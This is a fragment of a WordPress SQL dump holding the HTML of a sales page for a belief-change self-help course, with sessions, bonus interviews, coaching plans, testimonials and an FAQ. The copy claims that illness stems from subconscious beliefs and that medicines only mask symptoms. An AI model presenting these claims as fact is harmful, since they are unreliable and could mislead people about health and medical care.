class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 18:46:48', '2014-06-17 23:46:48', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(979, 2, '2014-06-17 19:20:34', '2014-06-18 00:20:34', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the 